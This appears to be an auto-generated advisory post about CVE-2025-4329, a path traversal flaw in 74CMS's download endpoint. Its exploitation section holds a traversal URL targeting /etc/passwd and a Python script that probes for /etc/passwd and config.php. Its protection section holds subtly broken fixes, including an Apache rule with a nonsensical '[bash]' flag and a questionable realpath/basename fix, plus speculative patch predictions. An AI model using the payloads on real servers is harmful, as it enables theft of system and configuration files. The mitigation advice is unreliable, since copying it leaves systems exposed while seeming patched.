74CMS, Path Traversal, CVE-2025-4329 (Medium)

Listen to this Post

How CVE-2025-4329 Works

CVE-2025-4329 is a path traversal vulnerability in 74CMS versions up to 3.33.0. The flaw exists in the `/index.php/index/download/index` endpoint, where improper validation of the `url` parameter allows attackers to manipulate file paths. By crafting a malicious URL, an attacker can traverse directories and access arbitrary files outside the intended directory. The vulnerability is remotely exploitable with low attack complexity, requiring only low-privilege access. The CVSS 4.0 score (5.3 MEDIUM) reflects its moderate impact due to limited confidentiality and integrity risks.

DailyCVE Form

Platform: 74CMS
Version: ≤ 3.33.0
Vulnerability: Path Traversal
Severity: Medium
Date: 06/12/2025

Prediction: Patch by 08/2025

What Undercode Say:

Exploitation

1. Craft Malicious URL:

/index.php/index/download/index?url=../../../../etc/passwd

2. Automated Testing (Python):

import requests
target = "http://example.com/index.php/index/download/index"
payloads = ["../../../etc/passwd", "../../../config.php"]
for payload in payloads:
r = requests.get(target, params={"url": payload})
if "root:" in r.text:
print(f"Vulnerable: {payload}")

Protection

1. Input Sanitization:

$url = realpath(basename($_GET['url']));

2. Web Server Rules (Apache):

RewriteRule ^index/download/index - [bash]

3. Patch Verification:

grep -r "basename.url" /path/to/74CMS

Analytics

  • Exploitability: High (public PoC available).
  • Affected Systems: ~1,200 installations (estimated).
  • Mitigation Priority: Medium (requires authentication but low privileges).

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top